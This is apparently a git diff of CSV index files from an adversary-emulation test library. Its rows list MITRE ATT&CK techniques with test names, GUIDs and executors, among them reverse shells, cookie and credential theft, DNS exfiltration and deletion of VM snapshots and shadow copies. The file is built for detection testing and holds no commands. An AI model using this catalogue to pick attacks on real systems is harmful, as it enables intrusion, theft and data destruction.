 execution,T1569.002,System Services: Service Execution,3,psexec.py (Impacket),edbcd8c9-3639-4844-afad-455c91e95a35,bash
@@ -1137,7 +1157,6 @@ persistence,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,2
 persistence,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,1,Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
 persistence,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,2,Modify HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig Security Support Provider configuration in registry,de3f8e74-3351-4fdb-a442-265dbf231738,powershell
 persistence,T1543.004,Create or Modify System Process: Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash
-persistence,T1543.004,Create or Modify System Process: Launch Daemon,2,Launch Daemon - Users Directory,6f899f9d-8a8e-4143-89a5-26fc2c3ec438,bash
 persistence,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
 persistence,T1505.003,Server Software Component: Web Shell,1,Web Shell Written to Disk,0a2ce662-1efa-496f-a472-2fe7b080db16,command_prompt
 persistence,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
@@ -1211,6 +1230,7 @@ persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Sta
 persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,17,Modify BootExecute Value,befc2b40-d487-4a5a-8813-c11085fb5672,powershell
 persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,18,Allowing custom application to execute during new RDP logon session,b051b3c0-66e7-4a81-916d-e6383bd3a669,command_prompt
 persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,19,Creating Boot Verification Program Key for application execution during successful boot,6e1666d5-3f2b-4b9a-80aa-f011322380d4,command_prompt
+persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,20,Add persistence via Windows Context Menu,de47f4a0-2acb-416d-9a6b-cee584a4c4d1,command_prompt
 persistence,T1136.003,Create Account: Cloud Account,1,AWS - Create a new IAM user,8d1c2368-b503-40c9-9057-8e42f21c58ad,sh
 persistence,T1136.003,Create Account: Cloud Account,2,Azure AD - Create a new user,e62d23ef-3153-4837-8625-fa4a3829134d,powershell
 persistence,T1136.003,Create Account: Cloud Account,3,Azure AD - Create a new user via Azure CLI,228c7498-be31-48e9-83b7-9cb906504ec8,powershell
@@ -1335,10 +1355,13 @@ command-and-control,T1219,Remote Access Software,11,MSP360 Connect Execution,b1b
 command-and-control,T1219,Remote Access Software,12,RustDesk Files Detected Test on Windows,f1641ba9-919a-4323-b74f-33372333bf0e,powershell
 command-and-control,T1219,Remote Access Software,13,Splashtop Execution,b025c580-029e-4023-888d-a42710d76934,powershell
 command-and-control,T1219,Remote Access Software,14,Splashtop Streamer Execution,3e1858ee-3550-401c-86ec-5e70ed79295b,powershell
+command-and-control,T1219,Remote Access Software,15,Microsoft App Quick Assist Execution,1aea6d15-70f1-4b4e-8b02-397b5d5ffe75,powershell
 command-and-control,T1572,Protocol Tunneling,1,DNS over HTTPS Large Query Volume,ae9ef4b0-d8c1-49d4-8758-06206f19af0a,powershell
 command-and-control,T1572,Protocol Tunneling,2,DNS over HTTPS Regular Beaconing,0c5f9705-c575-42a6-9609-cbbff4b2fc9b,powershell
 command-and-control,T1572,Protocol Tunneling,3,DNS over HTTPS Long Domain Query,748a73d5-cea4-4f34-84d8-839da5baa99c,powershell
 command-and-control,T1572,Protocol Tunneling,4,run ngrok,4cdc9fc7-53fb-4894-9f0c-64836943ea60,powershell
+command-and-control,T1572,Protocol Tunneling,5,Microsoft Dev tunnels (Linux/macOS),9f94a112-1ce2-464d-a63b-83c1f465f801,bash
+command-and-control,T1572,Protocol Tunneling,6,VSCode tunnels (Linux/macOS),b877943f-0377-44f4-8477-f79db7f07c4d,sh
 command-and-control,T1090.003,Proxy: Multi-hop Proxy,1,Psiphon,14d55ca0-920e-4b44-8425-37eedd72b173,powershell
 command-and-control,T1090.003,Proxy: Multi-hop Proxy,2,Tor Proxy Usage - Windows,7b9d85e5-c4ce-4434-8060-d3de83595e69,powershell
 command-and-control,T1090.003,Proxy: Multi-hop Proxy,3,Tor Proxy Usage - Debian/Ubuntu/FreeBSD,5ff9d047-6e9c-4357-b39b-5cf89d9b59c7,sh
@@ -1349,6 +1372,7 @@ command-and-control,T1573,Encrypted Channel,1,OpenSSL C2,21caf58e-87ad-440c-a6b8
 command-and-control,T1095,Non-Application Layer Protocol,1,ICMP C2,0268e63c-e244-42db-bef7-72a9e59fc1fc,powershell
 command-and-control,T1095,Non-Application Layer Protocol,2,Netcat C2,bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37,powershell
 command-and-control,T1095,Non-Application Layer Protocol,3,Powercat C2,3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e,powershell
+command-and-control,T1095,Non-Application Layer Protocol,4,Linux ICMP Reverse Shell using icmp-cnc,8e139e1f-1f3a-4be7-901d-afae9738c064,manual
 command-and-control,T1071.001,Application Layer Protocol: Web Protocols,1,Malicious User Agents - Powershell,81c13829-f6c9-45b8-85a6-053366d55297,powershell
 command-and-control,T1071.001,Application Layer Protocol: Web Protocols,2,Malicious User Agents - CMD,dc3488b0-08c7-4fea-b585-905c83b48180,command_prompt
 command-and-control,T1071.001,Application Layer Protocol: Web Protocols,3,Malicious User Agents - Nix,2d7c471a-e887-4b78-b0dc-b0df1f2e0658,sh
@@ -1445,6 +1469,7 @@ collection,T1530,Data from Cloud Storage Object,2,Azure - Scan for Anonymous Acc
 collection,T1530,Data from Cloud Storage Object,3,AWS - Scan for Anonymous Access to S3,979356b9-b588-4e49-bba4-c35517c484f5,sh
 collection,T1005,Data from Local System,1,Search files of interest and save them to a single zip file (Windows),d3d9af44-b8ad-4375-8b0a-4bff4b7e419c,powershell
 collection,T1005,Data from Local System,2,Find and dump sqlite databases (Linux),00cbb875-7ae4-4cf1-b638-e543fd825300,bash
+collection,T1005,Data from Local System,3,Copy Apple Notes database files using AppleScript,cfb6d400-a269-4c06-a347-6d88d584d5f7,sh
 collection,T1560.002,Archive Collected Data: Archive via Library,1,Compressing data using GZip in Python (FreeBSD/Linux),391f5298-b12d-4636-8482-35d9c17d53a8,sh
 collection,T1560.002,Archive Collected Data: Archive via Library,2,Compressing data using bz2 in Python (FreeBSD/Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,sh
 collection,T1560.002,Archive Collected Data: Archive via Library,3,Compressing data using zipfile in Python (FreeBSD/Linux),001a042b-859f-44d9-bf81-fd1c4e2200b0,sh
@@ -1462,6 +1487,7 @@ collection,T1114.002,Email Collection: Remote Email Collection,1,Office365 - Rem
 collection,T1056.004,Input Capture: Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
 lateral-movement,T1021.005,Remote Services:VNC,1,Enable Apple Remote Desktop Agent,8a930abe-841c-4d4f-a877-72e9fe90b9ea,sh
 lateral-movement,T1021.004,Remote Services: SSH,1,ESXi - Enable SSH via PowerCLI,8f6c14d1-f13d-4616-b7fc-98cc69fe56ec,powershell
+lateral-movement,T1021.004,Remote Services: SSH,2,ESXi - Enable SSH via VIM-CMD,280812c8-4dae-43e9-a74e-1d08ab997c0e,command_prompt
 lateral-movement,T1091,Replication Through Removable Media,1,USB Malware Spread Simulation,d44b7297-622c-4be8-ad88-ec40d7563c75,powershell
 lateral-movement,T1021.002,Remote Services: SMB/Windows Admin Shares,1,Map admin share,3386975b-367a-4fbb-9d77-4dcf3639ffd3,command_prompt
 lateral-movement,T1021.002,Remote Services: SMB/Windows Admin Shares,2,Map Admin Share PowerShell,514e9cd7-9207-4882-98b1-c8f791bae3c5,powershell
@@ -1516,6 +1542,8 @@ credential-access,T1003,OS Credential Dumping,7,Send NTLM Hash with RPC Test Con
 credential-access,T1539,Steal Web Session Cookie,1,Steal Firefox Cookies (Windows),4b437357-f4e9-4c84-9fa6-9bcee6f826aa,powershell
 credential-access,T1539,Steal Web Session Cookie,2,Steal Chrome Cookies (Windows),26a6b840-4943-4965-8df5-ef1f9a282440,powershell
 credential-access,T1539,Steal Web Session Cookie,3,Steal Chrome Cookies via Remote Debugging (Mac),e43cfdaf-3fb8-4a45-8de0-7eee8741d072,bash
+credential-access,T1539,Steal Web Session Cookie,4,Steal Chrome v127+ cookies via Remote Debugging (Windows),b647f4ee-88de-40ac-9419-f17fac9489a7,powershell
+credential-access,T1539,Steal Web Session Cookie,5,Copy Safari BinaryCookies files using AppleScript,e57ba07b-3a33-40cd-a892-748273b9b49a,sh
 credential-access,T1003.002,OS Credential Dumping: Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
 credential-access,T1003.002,OS Credential Dumping: Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
 credential-access,T1003.002,OS Credential Dumping: Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
@@ -1530,6 +1558,7 @@ credential-access,T1110.002,Brute Force: Password Cracking,1,Password Cracking w
 credential-access,T1555.001,Credentials from Password Stores: Keychain,1,Keychain Dump,88e1fa00-bf63-4e5b-a3e1-e2ea51c8cca6,sh
 credential-access,T1555.001,Credentials from Password Stores: Keychain,2,Export Certificate Item(s),1864fdec-ff86-4452-8c30-f12507582a93,sh
 credential-access,T1555.001,Credentials from Password Stores: Keychain,3,Import Certificate Item(s) into Keychain,e544bbcb-c4e0-4bd0-b614-b92131635f59,sh
+credential-access,T1555.001,Credentials from Password Stores: Keychain,4,Copy Keychain using cat utility,5c32102a-c508-49d3-978f-288f8a9f6617,sh
 credential-access,T1003.004,OS Credential Dumping: LSA Secrets,1,Dumping LSA Secrets,55295ab0-a703-433b-9ca4-ae13807de12f,command_prompt
 credential-access,T1003.004,OS Credential Dumping: LSA Secrets,2,Dump Kerberos Tickets from LSA using dumper.ps1,2dfa3bff-9a27-46db-ab75-7faefdaca732,powershell
 credential-access,T1606.002,Forge Web Credentials: SAML token,1,Golden SAML,b16a03bc-1089-4dcc-ad98-30fe8f3a2b31,powershell
@@ -1631,7 +1660,7 @@ credential-access,T1558.001,Steal or Forge Kerberos Tickets: Golden Ticket,2,Cra
 credential-access,T1649,Steal or Forge Authentication Certificates,1,Staging Local Certificates via Export-Certificate,eb121494-82d1-4148-9e2b-e624e03fbf3d,powershell
 credential-access,T1552.003,Unsecured Credentials: Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
 credential-access,T1552.003,Unsecured Credentials: Bash History,2,Search Through sh History,d87d3b94-05b4-40f2-a80f-99864ffa6803,sh
-credential-access,T1552.001,Unsecured Credentials: Credentials In Files,1,Find AWS credentials,2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17,sh
+credential-access,T1552.001,Unsecured Credentials: Credentials In Files,1,Find AWS credentials,37807632-d3da-442e-8c2e-00f44928ff8f,sh
 credential-access,T1552.001,Unsecured Credentials: Credentials In Files,2,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash
 credential-access,T1552.001,Unsecured Credentials: Credentials In Files,3,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
 credential-access,T1552.001,Unsecured Credentials: Credentials In Files,4,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
@@ -1645,6 +1674,9 @@ credential-access,T1552.001,Unsecured Credentials: Credentials In Files,11,WinPw
 credential-access,T1552.001,Unsecured Credentials: Credentials In Files,12,"WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials",aaa87b0e-5232-4649-ae5c-f1724a4b2798,powershell
 credential-access,T1552.001,Unsecured Credentials: Credentials In Files,13,List Credential Files via PowerShell,0d4f2281-f720-4572-adc8-d5bb1618affe,powershell
 credential-access,T1552.001,Unsecured Credentials: Credentials In Files,14,List Credential Files via Command Prompt,b0cdacf6-8949-4ffe-9274-a9643a788e55,command_prompt
+credential-access,T1552.001,Unsecured Credentials: Credentials In Files,15,Find Azure credentials,a8f6148d-478a-4f43-bc62-5efee9f931a4,sh
+credential-access,T1552.001,Unsecured Credentials: Credentials In Files,16,Find GCP credentials,aa12eb29-2dbb-414e-8b20-33d34af93543,sh
+credential-access,T1552.001,Unsecured Credentials: Credentials In Files,17,Find OCI credentials,9d9c22c9-fa97-4008-a204-478cf68c40af,sh
 credential-access,T1528,Steal Application Access Token,1,Azure - Dump All Azure Key Vaults with Microburst,1b83cddb-eaa7-45aa-98a5-85fb0a8807ea,powershell
 credential-access,T1552.006,Unsecured Credentials: Group Policy Preferences,1,GPP Passwords (findstr),870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f,command_prompt
 credential-access,T1552.006,Unsecured Credentials: Group Policy Preferences,2,GPP Passwords (Get-GPPPassword),e9584f82-322c-474a-b831-940fd8b4455c,powershell
@@ -1742,11 +1774,15 @@ discovery,T1087.001,Account Discovery: Local Account,7,Enumerate users and group
 discovery,T1087.001,Account Discovery: Local Account,8,Enumerate all accounts on Windows (Local),80887bec-5a9b-4efc-a81d-f83eb2eb32ab,command_prompt
 discovery,T1087.001,Account Discovery: Local Account,9,Enumerate all accounts via PowerShell (Local),ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b,powershell
 discovery,T1087.001,Account Discovery: Local Account,10,Enumerate logged on users via CMD (Local),a138085e-bfe5-46ba-a242-74a6fb884af3,command_prompt
+discovery,T1087.001,Account Discovery: Local Account,11,ESXi - Local Account Discovery via ESXCLI,9762ac6e-aa60-4449-a2f0-cbbd0e1fd22c,command_prompt
 discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
 discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,2,Detect Virtualization Environment (FreeBSD),e129d73b-3e03-4ae9-bf1e-67fc8921e0fd,sh
 discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,3,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
-discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,4,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
+discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,4,Detect Virtualization Environment via ioreg,a960185f-aef6-4547-8350-d1ce16680d09,sh
 discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,5,Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows),4a41089a-48e0-47aa-82cb-5b81a463bc78,powershell
+discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,6,Detect Virtualization Environment using sysctl (hw.model),6beae646-eb4c-4730-95be-691a4094408c,sh
+discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,7,Check if System Integrity Protection is enabled,2b73cd9b-b2fb-4357-b9d7-c73c41d9e945,sh
+discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,8,Detect Virtualization Environment using system_profiler,e04d2e89-de15-4d90-92f9-a335c7337f0f,sh
 discovery,T1069.002,Permission Groups Discovery: Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt
 discovery,T1069.002,Permission Groups Discovery: Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell
 discovery,T1069.002,Permission Groups Discovery: Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt
@@ -1836,6 +1872,8 @@ discovery,T1082,System Information Discovery,35,"Check OS version via ""ver"" co
 discovery,T1082,System Information Discovery,36,"Display volume shadow copies with ""vssadmin""",7161b085-816a-491f-bab4-d68e974b7995,command_prompt
 discovery,T1082,System Information Discovery,37,Identify System Locale and Regional Settings with PowerShell,ce479c1a-e8fa-42b2-812a-96b0f2f4d28a,command_prompt
 discovery,T1082,System Information Discovery,38,Enumerate Available Drives via gdr,c187c9bc-4511-40b3-aa10-487b2c70b6a5,command_prompt
+discovery,T1082,System Information Discovery,39,Discover OS Product Name via Registry,be3b5fe3-a575-4fb8-83f6-ad4a68dd5ce7,command_prompt
+discovery,T1082,System Information Discovery,40,Discover OS Build Number via Registry,acfcd709-0013-4f1e-b9ee-bc1e7bafaaec,command_prompt
 discovery,T1016.002,System Network Configuration Discovery: Wi-Fi Discovery,1,Enumerate Stored Wi-Fi Profiles And Passwords via netsh,53cf1903-0fa7-4177-ab14-f358ae809eec,command_prompt
 discovery,T1010,Application Window Discovery,1,List Process Main Windows - C# .NET,fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4,command_prompt
 discovery,T1497.003,Time Based Evasion,1,Delay execution with ping,8b87dd03-8204-478c-bac3-3959f6528de3,sh
@@ -1919,6 +1957,8 @@ discovery,T1614.001,System Location Discovery: System Language Discovery,5,Disco
 discovery,T1614.001,System Location Discovery: System Language Discovery,6,Discover System Language by Environment Variable Query,cb8f7cdc-36c4-4ed0-befc-7ad7d24dfd7a,sh
 discovery,T1614.001,System Location Discovery: System Language Discovery,7,Discover System Language with dism.exe,69f625ba-938f-4900-bdff-82ada3df5d9c,command_prompt
 discovery,T1614.001,System Location Discovery: System Language Discovery,8,Discover System Language by Windows API Query,e39b99e9-ce7f-4b24-9c88-0fbad069e6c6,command_prompt
+discovery,T1614.001,System Location Discovery: System Language Discovery,9,Discover System Language with WMIC,4758003d-db14-4959-9c0f-9e87558ac69e,command_prompt
+discovery,T1614.001,System Location Discovery: System Language Discovery,10,Discover System Language with Powershell,1f23bfe8-36d4-49ce-903a-19a1e8c6631b,powershell
 discovery,T1012,Query Registry,1,Query Registry,8f7578c4-9863-4d83-875c-a565573bbdf0,command_prompt
 discovery,T1012,Query Registry,2,Query Registry with Powershell cmdlets,0434d081-bb32-42ce-bcbb-3548e4f2628f,powershell
 discovery,T1012,Query Registry,3,Enumerate COM Objects in Registry with Powershell,0d80d088-a84c-4353-af1a-fc8b439f1564,powershell
@@ -1939,6 +1979,8 @@ discovery,T1518.001,Software Discovery: Security Software Discovery,9,Security S
 discovery,T1518.001,Software Discovery: Security Software Discovery,10,Security Software Discovery - Windows Firewall Enumeration,9dca5a1d-f78c-4a8d-accb-d6de67cfed6b,powershell
 discovery,T1518.001,Software Discovery: Security Software Discovery,11,Get Windows Defender exclusion settings using WMIC,e31564c8-4c60-40cd-a8f4-9261307e8336,command_prompt
 discovery,T1526,Cloud Service Discovery,1,Azure - Dump Subscription Data with MicroBurst,1e40bb1d-195e-401e-a86b-c192f55e005c,powershell
+discovery,T1526,Cloud Service Discovery,2,AWS - Enumerate common cloud services,aa8b9bcc-46fa-4a59-9237-73c7b93a980c,powershell
+discovery,T1526,Cloud Service Discovery,3,Azure - Enumerate common cloud services,58f57c8f-db14-4e62-a4d3-5aaf556755d7,powershell
 discovery,T1018,Remote System Discovery,1,Remote System Discovery - net,85321a9c-897f-4a60-9f20-29788e50bccd,command_prompt
 discovery,T1018,Remote System Discovery,2,Remote System Discovery - net group Domain Computers,f1bf6c8f-9016-4edf-aff9-80b65f5d711f,command_prompt
 discovery,T1018,Remote System Discovery,3,Remote System Discovery - nltest,52ab5108-3f6f-42fb-8ba3-73bc054f22c8,command_prompt
@@ -1972,6 +2014,7 @@ discovery,T1046,Network Service Discovery,8,WinPwn - fruit,bb037826-cbe8-4a41-93
 discovery,T1046,Network Service Discovery,9,Network Service Discovery for Containers,06eaafdb-8982-426e-8a31-d572da633caa,sh
 discovery,T1046,Network Service Discovery,10,Port-Scanning /24 Subnet with PowerShell,05df2a79-dba6-4088-a804-9ca0802ca8e4,powershell
 discovery,T1046,Network Service Discovery,11,Remote Desktop Services Discovery via PowerShell,9e55750e-4cbf-4013-9627-e9a045b541bf,powershell
+discovery,T1046,Network Service Discovery,12,Port Scan using nmap (Port range),0d5a2b03-3a26-45e4-96ae-89485b4d1f97,sh
 discovery,T1518,Software Discovery,1,Find and Display Internet Explorer Browser Version,68981660-6670-47ee-a5fa-7e74806420a4,command_prompt
 discovery,T1518,Software Discovery,2,Applications Installed,c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b,powershell
 discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,sh
@@ -1984,7 +2027,9 @@ discovery,T1124,System Time Discovery,2,System Time Discovery - PowerShell,1d571
 discovery,T1124,System Time Discovery,3,System Time Discovery in FreeBSD/macOS,f449c933-0891-407f-821e-7916a21a1a6f,sh
 discovery,T1124,System Time Discovery,4,System Time Discovery W32tm as a Delay,d5d5a6b0-0f92-42d8-985d-47aafa2dd4db,command_prompt
 discovery,T1124,System Time Discovery,5,System Time with Windows time Command,53ead5db-7098-4111-bb3f-563be390e72e,command_prompt
+discovery,T1124,System Time Discovery,6,Discover System Time Zone via Registry,25c5d1f1-a24b-494a-a6c5-5f50a1ae7f47,command_prompt
 reconnaissance,T1592.001,Gather Victim Host Information: Hardware,1,Enumerate PlugNPlay Camera,d430bf85-b656-40e7-b238-42db01df0183,powershell
+reconnaissance,T1595.003,Active Scanning: Wordlist Scanning,1,Web Server Wordlist Scan,89a83c3e-0b39-4c80-99f5-c2aa084098bd,powershell
 impact,T1489,Service Stop,1,Windows - Stop service using Service Controller,21dfb440-830d-4c86-a3e5-2a491d5a8d04,command_prompt
 impact,T1489,Service Stop,2,Windows - Stop service using net.exe,41274289-ec9c-4213-bea4-e43c4aa57954,command_prompt
 impact,T1489,Service Stop,3,Windows - Stop service by killing process,f3191b84-c38b-400b-867e-3a217a27795f,command_prompt
@@ -1994,6 +2039,7 @@ impact,T1489,Service Stop,6,Linux - Stop service by killing process using kill,3
 impact,T1489,Service Stop,7,Linux - Stop service by killing process using pkill,08b4718f-a8bf-4bb5-a552-294fc5178fea,sh
 impact,T1491.001,Defacement: Internal Defacement,1,Replace Desktop Wallpaper,30558d53-9d76-41c4-9267-a7bd5184bed3,powershell
 impact,T1491.001,Defacement: Internal Defacement,2,Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message,ffcbfaab-c9ff-470b-928c-f086b326089b,powershell
+impact,T1491.001,Defacement: Internal Defacement,3,ESXi - Change Welcome Message on Direct Console User Interface (DCUI),30905f21-34f3-4504-8b4c-f7a5e314b810,command_prompt
 impact,T1531,Account Access Removal,1,Change User Password - Windows,1b99ef28-f83c-4ec5-8a08-1a56263a5bb2,command_prompt
 impact,T1531,Account Access Removal,2,Delete User - Windows,f21a1d7d-a62f-442a-8c3a-2440d43b19e5,command_prompt
 impact,T1531,Account Access Removal,3,Remove Account From Domain Admin Group,43f71395-6c37-498e-ab17-897d814a0947,powershell
@@ -2017,6 +2063,7 @@ impact,T1485,Data Destruction,1,Windows - Overwrite file with SysInternals SDele
 impact,T1485,Data Destruction,2,FreeBSD/macOS/Linux - Overwrite file with DD,38deee99-fd65-4031-bec8-bfa4f9f26146,sh
 impact,T1485,Data Destruction,3,Overwrite deleted data on C drive,321fd25e-0007-417f-adec-33232252be19,command_prompt
 impact,T1485,Data Destruction,4,GCP - Delete Bucket,4ac71389-40f4-448a-b73f-754346b3f928,sh
+impact,T1485,Data Destruction,5,ESXi - Delete VM Snapshots,1207ddff-f25b-41b3-aa0e-7c26d2b546d1,command_prompt
 impact,T1490,Inhibit System Recovery,1,Windows - Delete Volume Shadow Copies,43819286-91a9-4369-90ed-d31fb4da2c01,command_prompt
 impact,T1490,Inhibit System Recovery,2,Windows - Delete Volume Shadow Copies via WMI,6a3ff8dd-f49c-4272-a658-11c2fe58bd88,command_prompt
 impact,T1490,Inhibit System Recovery,3,Windows - wbadmin Delete Windows Backup Catalog,263ba6cb-ea2b-41c9-9d4e-b652dadd002c,command_prompt
@@ -2043,6 +2090,7 @@ impact,T1529,System Shutdown/Reboot,11,Reboot System via `poweroff` - Linux,6130
 impact,T1529,System Shutdown/Reboot,12,Logoff System - Windows,3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4,command_prompt
 impact,T1529,System Shutdown/Reboot,13,ESXi - Terminates VMs using pkill,987c9b4d-a637-42db-b1cb-e9e242c3991b,command_prompt
 impact,T1529,System Shutdown/Reboot,14,ESXi - Avoslocker enumerates VMs and forcefully kills VMs,189f7d6e-9442-4160-9bc3-5e4104d93ece,command_prompt
+impact,T1529,System Shutdown/Reboot,15,ESXi - vim-cmd Used to Power Off VMs,622cc1a0-45e7-428c-aed7-c96dd605fbe6,command_prompt
 initial-access,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
 initial-access,T1566.002,Phishing: Spearphishing Link,1,Paste and run technique,bc177ef9-6a12-4ebc-a2ec-d41e19c2791d,powershell
 initial-access,T1566.001,Phishing: Spearphishing Attachment,1,Download Macro-Enabled Phishing Attachment,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell
@@ -2079,8 +2127,10 @@ exfiltration,T1041,Exfiltration Over C2 Channel,2,Text Based Data Exfiltration u
 exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh
 exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Alternative Protocol - SSH,7c3cb337-35ae-4d06-bf03-3032ed2ec268,sh
 exfiltration,T1048,Exfiltration Over Alternative Protocol,3,DNSExfiltration (doh),c943d285-ada3-45ca-b3aa-7cd6500c6a48,powershell
+exfiltration,T1048,Exfiltration Over Alternative Protocol,4,Exfiltrate Data using DNS Queries via dig,a27916da-05f2-4316-a3ee-feec67a437be,bash
 exfiltration,T1567.003,Exfiltration Over Web Service: Exfiltration to Text Storage Sites,1,Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows),c2e8ab6e-431e-460a-a2aa-3bc6a32022e3,powershell
 exfiltration,T1567.002,Exfiltration Over Web Service: Exfiltration to Cloud Storage,1,Exfiltrate data with rclone to cloud Storage - Mega (Windows),8529ee44-279a-4a19-80bf-b846a40dda58,powershell
+exfiltration,T1567.002,Exfiltration Over Web Service: Exfiltration to Cloud Storage,2,Exfiltrate data with rclone to cloud Storage - AWS S3,a4b74723-5cee-4300-91c3-5e34166909b4,powershell
 exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c51-10f4-46ce-9144-e02137b2016a,sh
 exfiltration,T1030,Data Transfer Size Limits,2,Network-Based Data Transfer in Small Chunks,f0287b58-f4bc-40f6-87eb-692e126e7f8f,powershell
 exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,1,Exfiltration Over Alternative Protocol - HTTP,1d1abbd6-a3d3-4b2e-bef5-c59293f46eff,manual

atomics/Indexes/Indexes-CSV/linux-index.csv

@@ -191,8 +191,11 @@ persistence,T1078.003,Valid Accounts: Local Accounts,11,Login as nobody (Linux),
 persistence,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
 command-and-control,T1132.001,Data Encoding: Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
 command-and-control,T1132.001,Data Encoding: Standard Encoding,2,Base64 Encoded data (freebsd),2d97c626-7652-449e-a986-b02d9051c298,sh
+command-and-control,T1572,Protocol Tunneling,5,Microsoft Dev tunnels (Linux/macOS),9f94a112-1ce2-464d-a63b-83c1f465f801,bash
+command-and-control,T1572,Protocol Tunneling,6,VSCode tunnels (Linux/macOS),b877943f-0377-44f4-8477-f79db7f07c4d,sh
 command-and-control,T1090.003,Proxy: Multi-hop Proxy,3,Tor Proxy Usage - Debian/Ubuntu/FreeBSD,5ff9d047-6e9c-4357-b39b-5cf89d9b59c7,sh
 command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh
+command-and-control,T1095,Non-Application Layer Protocol,4,Linux ICMP Reverse Shell using icmp-cnc,8e139e1f-1f3a-4be7-901d-afae9738c064,manual
 command-and-control,T1071.001,Application Layer Protocol: Web Protocols,3,Malicious User Agents - Nix,2d7c471a-e887-4b78-b0dc-b0df1f2e0658,sh
 command-and-control,T1105,Ingress Tool Transfer,1,rsync remote file copy (push),0fc6e977-cb12-44f6-b263-2824ba917409,sh
 command-and-control,T1105,Ingress Tool Transfer,2,rsync remote file copy (pull),3180f7d5-52c0-4493-9ea0-e3431a84773f,sh
@@ -226,7 +229,6 @@ collection,T1560.002,Archive Collected Data: Archive via Library,1,Compressing d
 collection,T1560.002,Archive Collected Data: Archive via Library,2,Compressing data using bz2 in Python (FreeBSD/Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,sh
 collection,T1560.002,Archive Collected Data: Archive via Library,3,Compressing data using zipfile in Python (FreeBSD/Linux),001a042b-859f-44d9-bf81-fd1c4e2200b0,sh
 collection,T1560.002,Archive Collected Data: Archive via Library,4,Compressing data using tarfile in Python (FreeBSD/Linux),e86f1b4b-fcc1-4a2a-ae10-b49da01458db,sh
